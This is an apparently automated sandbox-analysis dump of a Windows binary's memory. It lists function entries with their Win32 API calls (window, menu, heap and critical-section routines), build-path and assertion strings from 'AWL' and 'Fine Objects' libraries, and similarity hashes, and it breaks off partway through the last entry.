                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?), ref: 0043E4E7
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\windowawl.cpp, xrefs: 0043E4A7
                                                                                                • @fO, xrefs: 0043E4B1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$Long
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\src\windowawl.cpp
                                                                                                • API String ID: 847901565-1732439790
                                                                                                • Opcode ID: 8d52d719a1200115ae48d5584585eaac56609c7c71c3ab8fb0e39c48cb0e1a68
                                                                                                • Instruction ID: 79ddafd946443fd004efd9ce49a1d373b5105a2b24d44d139811d5784baa79c4
                                                                                                • Opcode Fuzzy Hash: 8d52d719a1200115ae48d5584585eaac56609c7c71c3ab8fb0e39c48cb0e1a68
                                                                                                • Instruction Fuzzy Hash: 81113372201501ABD731A72AED05B2B7769AFA8720F00562FF015D62D1DBA8EC41CBAC
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 004362C7
                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 004362EF
                                                                                                • IsWindow.USER32(?), ref: 004362FF
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00436327
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$Long
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl
                                                                                                • API String ID: 847901565-3353917190
                                                                                                • Opcode ID: 628c19d7196e7d529de5999a1be105668df2cf80e40a8bb59f44993dbe8d2cbd
                                                                                                • Instruction ID: 66d4be590f43b5cbb8618cacc7c8237a273ebd1ac51fc28027c7348b268294c8
                                                                                                • Opcode Fuzzy Hash: 628c19d7196e7d529de5999a1be105668df2cf80e40a8bb59f44993dbe8d2cbd
                                                                                                • Instruction Fuzzy Hash: B211487070021677DB146B29DC02F3BB6589F88715F02812FB915E33D2EBB9E824CA9C
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(00000000), ref: 00452417
                                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0045243F
                                                                                                • IsWindow.USER32(00000000), ref: 0045244F
                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00452477
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$Long
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl
                                                                                                • API String ID: 847901565-3353917190
                                                                                                • Opcode ID: 30d4c74b687a05c6ca4534ef0cc6aa8081c1feb3c46a78de8a6384e47a014a6f
                                                                                                • Instruction ID: 0b59623d1ebbec24eb3f325455a453d98d5c1a6075d5d54e04dc0002aa3e05f0
                                                                                                • Opcode Fuzzy Hash: 30d4c74b687a05c6ca4534ef0cc6aa8081c1feb3c46a78de8a6384e47a014a6f
                                                                                                • Instruction Fuzzy Hash: 6211297074021277D71467299D02F3B76585F96345F04812FBD25E32D2EBA9D8248A9C
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00534E70), ref: 004840DC
                                                                                                • MessageBoxW.USER32(00000000,?,Fine Objects,00001010), ref: 0048411E
                                                                                                • _abort.LIBCMT ref: 00484124
                                                                                                • LeaveCriticalSection.KERNEL32(00534E70,?), ref: 00484142
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\fineobjects\src\privateallocators.cpp, xrefs: 004840BB
                                                                                                • Fine Objects, xrefs: 00484113
                                                                                                • @fO, xrefs: 004840C5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeaveValue$Exception@8MessageThrow_abort
                                                                                                • String ID: @fO$Fine Objects$d:\build\teamagent\_work\1\s\0\fineobjects\src\privateallocators.cpp
                                                                                                • API String ID: 454572931-2458099645
                                                                                                • Opcode ID: a64cd4e3ff96fcf33bd297e67a6a45da23b9943bb607e668b07d77253bb28ddf
                                                                                                • Instruction ID: f92defbeb025126ab9f86b6730099cdf9427cc6b0e61fbf3c8f2ae5ca4044964
                                                                                                • Opcode Fuzzy Hash: a64cd4e3ff96fcf33bd297e67a6a45da23b9943bb607e668b07d77253bb28ddf
                                                                                                • Instruction Fuzzy Hash: AE213A31500285ABEB20DB18CC06BAEBBB8EF51719F14026FE552E37D2C7F89554C795
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 0043D036
                                                                                                • InvalidateRect.USER32(?,0043FB07,00000001,?,00000000,0043FB07), ref: 0043D068
                                                                                                • GetLastError.KERNEL32(?,00000000,0043FB07), ref: 0043D072
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl, xrefs: 0043D047, 0043D094
                                                                                                • AWL::CWindow::InvalidateRect, xrefs: 0043D09E
                                                                                                • @fO, xrefs: 0043D051
                                                                                                • ::InvalidateRect(handle, &rect, erase) != 0, xrefs: 0043D099
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ErrorInvalidateLastRectWindow
                                                                                                • String ID: ::InvalidateRect(handle, &rect, erase) != 0$@fO$AWL::CWindow::InvalidateRect$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl
                                                                                                • API String ID: 917287404-1714956489
                                                                                                • Opcode ID: 7afeb6a5e8afdf843a25ceb42410616043daa820434476c733ea203cc29cb6de
                                                                                                • Instruction ID: a26546a247994df772542a8fac3da53b19ad5c1d4ad378e49306bf7698e3c995
                                                                                                • Opcode Fuzzy Hash: 7afeb6a5e8afdf843a25ceb42410616043daa820434476c733ea203cc29cb6de
                                                                                                • Instruction Fuzzy Hash: E701C831F5020457EB382A246C46B7B36689B59F09F00112FBD44E66C2FA99DC21869E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • SetLastError.KERNEL32(00000000,00000000,?,?,0043BC5A,?,00000002,?,?), ref: 004312E9
                                                                                                • MapWindowPoints.USER32 ref: 0043130F
                                                                                                • GetLastError.KERNEL32(?,?,0043BC5A,?,00000002,?,?), ref: 0043131F
                                                                                                • GetLastError.KERNEL32(?,?,0043BC5A,?,00000002,?,?), ref: 00431325
                                                                                                  • Part of subcall function 00439430: GetCurrentProcess.KERNEL32(00000000,00000000,00502800,?,?,?,0043F3D3,?), ref: 00439460
                                                                                                  • Part of subcall function 00439430: TerminateProcess.KERNEL32(00000000,?,?,?,0043F3D3,?), ref: 00439467
                                                                                                  • Part of subcall function 00439430: InterlockedDecrement.KERNEL32(?), ref: 004394BA
                                                                                                  • Part of subcall function 00439430: GetCurrentProcess.KERNEL32(00000000), ref: 004394E5
                                                                                                  • Part of subcall function 00439430: TerminateProcess.KERNEL32(00000000), ref: 004394EC
                                                                                                Strings
                                                                                                • error == ERROR_SUCCESS, xrefs: 00431348
                                                                                                • AWL::MapWindowPoints, xrefs: 0043134D
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\windowawl.cpp, xrefs: 00431343
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Process$ErrorLast$CurrentTerminate$DecrementInterlockedPointsWindow
                                                                                                • String ID: AWL::MapWindowPoints$d:\build\teamagent\_work\1\s\0\awl\src\windowawl.cpp$error == ERROR_SUCCESS
                                                                                                • API String ID: 784446666-322694082
                                                                                                • Opcode ID: 72ec000bc823b86f52c73a973313051ad57ae3bf13bd1c8563bf3781b322c9f2
                                                                                                • Instruction ID: 42f1c1e6a89d12943b573ef9435403e36355996f8ed0e1484a3851eecfbd5149
                                                                                                • Opcode Fuzzy Hash: 72ec000bc823b86f52c73a973313051ad57ae3bf13bd1c8563bf3781b322c9f2
                                                                                                • Instruction Fuzzy Hash: 3D01F53170070157FB245765AC45A3F2695FB8CB51F10246FED06D6AA0EB28CC00C659
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(00000001), ref: 00436376
                                                                                                • SetWindowPlacement.USER32(00000001,0000002C,?,004325DA,0000002C,0000002C,?,?,004DF090), ref: 004363A6
                                                                                                • GetLastError.KERNEL32(?,004325DA,0000002C,0000002C,?,?,004DF090), ref: 004363B0
                                                                                                Strings
                                                                                                • AWL::CWindow::SetWindowPlacement, xrefs: 004363DC
                                                                                                • @fO, xrefs: 00436391
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl, xrefs: 00436387, 004363D2
                                                                                                • ::SetWindowPlacement(handle, &windowPlacement) != 0, xrefs: 004363D7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$ErrorLastPlacement
                                                                                                • String ID: ::SetWindowPlacement(handle, &windowPlacement) != 0$@fO$AWL::CWindow::SetWindowPlacement$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl
                                                                                                • API String ID: 4277315255-4169767729
                                                                                                • Opcode ID: ff7f5da762a3b77446008566e627d4a0e3328ccf33290cd17d601ae273d8b0ae
                                                                                                • Instruction ID: 2be202aa21572d291614c50fe71f8839d930f49d85ffdc371559cf24c9c4f042
                                                                                                • Opcode Fuzzy Hash: ff7f5da762a3b77446008566e627d4a0e3328ccf33290cd17d601ae273d8b0ae
                                                                                                • Instruction Fuzzy Hash: 4A01D6317406126BDB201A649C06B7B76589B69B05F01952BFD45DA7C2FEA9CC20818D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(00000000), ref: 00436426
                                                                                                • GetWindowPlacement.USER32(00000000,?), ref: 00436456
                                                                                                • GetLastError.KERNEL32 ref: 00436460
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl, xrefs: 00436437, 00436482
                                                                                                • @fO, xrefs: 00436441
                                                                                                • ::GetWindowPlacement(handle, &windowPlacement) != 0, xrefs: 00436487
                                                                                                • AWL::CWindow::GetWindowPlacement, xrefs: 0043648C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$ErrorLastPlacement
                                                                                                • String ID: ::GetWindowPlacement(handle, &windowPlacement) != 0$@fO$AWL::CWindow::GetWindowPlacement$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl
                                                                                                • API String ID: 4277315255-2717439261
                                                                                                • Opcode ID: 44325f1549d4db6359f9d884a973d8fa02993aa1fd566973bf5398cfc81075ec
                                                                                                • Instruction ID: ca0ac6c4e45d0e05220d601e96eb92d731e3780b2738008e7730e7522614678a
                                                                                                • Opcode Fuzzy Hash: 44325f1549d4db6359f9d884a973d8fa02993aa1fd566973bf5398cfc81075ec
                                                                                                • Instruction Fuzzy Hash: 2001D631B502163BDB301668DC06B3B36599B75B19F41912BFD81D76C5FAADDC20828D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042B108
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042B124
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042B140
                                                                                                • DeleteCriticalSection.KERNEL32(FFFFFFFF,?,?,?,?,?,004DE9BC,000000FF), ref: 0042B15F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DecrementInterlocked$CriticalDeleteSection
                                                                                                • String ID: xMS$xMS$xMS
                                                                                                • API String ID: 297879488-2738134327
                                                                                                • Opcode ID: 9aa4598c756c5f7f71567b9f15662001e209c32ee15516ec38c77ba2fe7f1d4b
                                                                                                • Instruction ID: 5d7940d9f84a600ec21b01442f04a622adfff493aa4b964cd53960526789072d
                                                                                                • Opcode Fuzzy Hash: 9aa4598c756c5f7f71567b9f15662001e209c32ee15516ec38c77ba2fe7f1d4b
                                                                                                • Instruction Fuzzy Hash: C311BC32100B41EBC3119F6ACC41B3FBBA9FB89B61F000A1EF454A3781D778AD119B94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 004943E0
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004943EA
                                                                                                • InterlockedIncrement.KERNEL32(00000001), ref: 0049440B
                                                                                                • InterlockedDecrement.KERNEL32(00000001), ref: 00494415
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$DecrementIncrement
                                                                                                • String ID: 5CI$xMS$xMS
                                                                                                • API String ID: 2172605799-2580492675
                                                                                                • Opcode ID: e3851f7bb4bb6bd86011472707d21ddbfbe5e9025e3f0d12c67301b5b6982e8f
                                                                                                • Instruction ID: 441a4c76255bf8603b0f617048f4edea7fbf2c9cb4742c27a3be0d2a8e732cde
                                                                                                • Opcode Fuzzy Hash: e3851f7bb4bb6bd86011472707d21ddbfbe5e9025e3f0d12c67301b5b6982e8f
                                                                                                • Instruction Fuzzy Hash: 782112B5601B01AF9760DF29D984916BBF5FF5C7113008A2AE99AC3B11D734F861CF94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                • ::SetWindowRgn(handle, region, redraw) != 0, xrefs: 00465173
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl, xrefs: 00465120, 0046516E
                                                                                                • AWL::CWindow::SetWindowRgn, xrefs: 00465178
                                                                                                • @fO, xrefs: 0046512A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$ErrorLast
                                                                                                • String ID: ::SetWindowRgn(handle, region, redraw) != 0$@fO$AWL::CWindow::SetWindowRgn$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl
                                                                                                • API String ID: 531141135-2599818743
                                                                                                • Opcode ID: 36162a33a9fce53c53fbddc0ac25510dee4aaf7f73ea333a968b0d9f4e9f691f
                                                                                                • Instruction ID: fdcd40d1cafb0313a208298b4bd1a3274e7f11c396466111f476097ad917d9b1
                                                                                                • Opcode Fuzzy Hash: 36162a33a9fce53c53fbddc0ac25510dee4aaf7f73ea333a968b0d9f4e9f691f
                                                                                                • Instruction Fuzzy Hash: B301A731F40B112BEB342B249C06FBF2555AB62B09F54443BF954E66C6FAA9CC11864A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsMenu.USER32 ref: 0042F1A7
                                                                                                • SetMenuItemInfoW.USER32 ref: 0042F1DD
                                                                                                • GetLastError.KERNEL32 ref: 0042F1E7
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                  • Part of subcall function 00439430: GetCurrentProcess.KERNEL32(00000000,00000000,00502800,?,?,?,0043F3D3,?), ref: 00439460
                                                                                                  • Part of subcall function 00439430: TerminateProcess.KERNEL32(00000000,?,?,?,0043F3D3,?), ref: 00439467
                                                                                                  • Part of subcall function 00439430: InterlockedDecrement.KERNEL32(?), ref: 004394BA
                                                                                                  • Part of subcall function 00439430: GetCurrentProcess.KERNEL32(00000000), ref: 004394E5
                                                                                                  • Part of subcall function 00439430: TerminateProcess.KERNEL32(00000000), ref: 004394EC
                                                                                                Strings
                                                                                                • AWL::CMenu::SetMenuItemInfoW, xrefs: 0042F213
                                                                                                • @fO, xrefs: 0042F1C1
                                                                                                • ::SetMenuItemInfo(handle, item, byPos, &menuItemInfo) != 0, xrefs: 0042F20E
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\menuawl.h, xrefs: 0042F1B7, 0042F209
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Process$CriticalCurrentMenuSectionTerminateValue$DecrementEnterErrorException@8InfoInterlockedItemLastLeaveThrow
                                                                                                • String ID: ::SetMenuItemInfo(handle, item, byPos, &menuItemInfo) != 0$@fO$AWL::CMenu::SetMenuItemInfoW$d:\build\teamagent\_work\1\s\0\awl\inc\menuawl.h
                                                                                                • API String ID: 547705551-3271822807
                                                                                                • Opcode ID: 7c0f7911fa5961301cd959ca34ae816df86eb392be04a9dfa2873b6f7770fbb3
                                                                                                • Instruction ID: d00fdfdf1348c230e1fc6e4b0431a7a083fdc191dcdbe12693b576a24fa5f802
                                                                                                • Opcode Fuzzy Hash: 7c0f7911fa5961301cd959ca34ae816df86eb392be04a9dfa2873b6f7770fbb3
                                                                                                • Instruction Fuzzy Hash: 750124313002219BEB341B60BC0AB3B6665EBA1705FC0483FF941D16D2FFAA8C248629
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004861A0: EnterCriticalSection.KERNEL32(00535528,74E070F0,00000000), ref: 004861CB
                                                                                                  • Part of subcall function 00489750: GetProcessHeap.KERNEL32(00000000,?,?,004889BA), ref: 00489769
                                                                                                  • Part of subcall function 00489750: HeapFree.KERNEL32(00000000), ref: 00489770
                                                                                                  • Part of subcall function 00489750: GetLastError.KERNEL32 ref: 0048977A
                                                                                                  • Part of subcall function 00489B60: InterlockedDecrement.KERNEL32(00000004), ref: 00489BC6
                                                                                                  • Part of subcall function 00489B60: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000001,00000000,004E568E,000000FF,?,00486473,?), ref: 00489C23
                                                                                                  • Part of subcall function 00489B60: HeapFree.KERNEL32(00000000,?,00486473,?), ref: 00489C2A
                                                                                                  • Part of subcall function 00489B60: GetLastError.KERNEL32(?,00486473,?), ref: 00489C34
                                                                                                  • Part of subcall function 0046E590: GetProcessHeap.KERNEL32(00000000,?,0053557C,?,00000001,?,00489D8D,00000000,00000000,00486386,?), ref: 0046E5B9
                                                                                                  • Part of subcall function 0046E590: HeapFree.KERNEL32(00000000,?,00000001,?,00489D8D,00000000,00000000,00486386,?), ref: 0046E5BC
                                                                                                  • Part of subcall function 0046E590: GetLastError.KERNEL32(?,00000001,?,00489D8D,00000000,00000000,00486386,?), ref: 0046E5C2
                                                                                                  • Part of subcall function 0046D950: GetProcessHeap.KERNEL32(00000000,00000000,00000000,00475BE5,00000000), ref: 0046D96A
                                                                                                  • Part of subcall function 0046D950: HeapFree.KERNEL32(00000000), ref: 0046D971
                                                                                                  • Part of subcall function 0046D950: GetLastError.KERNEL32 ref: 0046D97B
                                                                                                • DeleteCriticalSection.KERNEL32(00535528), ref: 004860AD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Heap$ErrorFreeLastProcess$CriticalSection$DecrementDeleteEnterInterlocked
                                                                                                • String ID: (US$LUS$XUS$dUS$dUS$|US
                                                                                                • API String ID: 2220416801-273709384
                                                                                                • Opcode ID: 643ebba70e2a35a4d24d54906c1a35cc38ee47467a85913fc482595458cab108
                                                                                                • Instruction ID: 4ac68824753bf9c3362c693e0c9ec09a181aa939cd302c99a6f25a8d5802ec9c
                                                                                                • Opcode Fuzzy Hash: 643ebba70e2a35a4d24d54906c1a35cc38ee47467a85913fc482595458cab108
                                                                                                • Instruction Fuzzy Hash: 8F112770904AC8EAD700FBE9850536EBFE2EB41318F14059ED0151B3C2DB791E049762
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 0044E0B3
                                                                                                • IsWindow.USER32(?), ref: 0044E0E9
                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0044E11F
                                                                                                Strings
                                                                                                • @fO, xrefs: 0044E104
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\winctrlawl.h, xrefs: 0044E0FA
                                                                                                • @fO, xrefs: 0044E0CE
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\unicodecomboboxawl.cpp, xrefs: 0044E0C4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$MessageSend
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\winctrlawl.h$d:\build\teamagent\_work\1\s\0\awl\src\unicodecomboboxawl.cpp
                                                                                                • API String ID: 1496643700-1620729082
                                                                                                • Opcode ID: c086a5155bcd9adcb998fee45ac4c1b721df93561d1b6cf05d8a3f5be157aa97
                                                                                                • Instruction ID: 23331c1be2268cc9f436f985894993cda10319a9e7bf8d72566189195665f18a
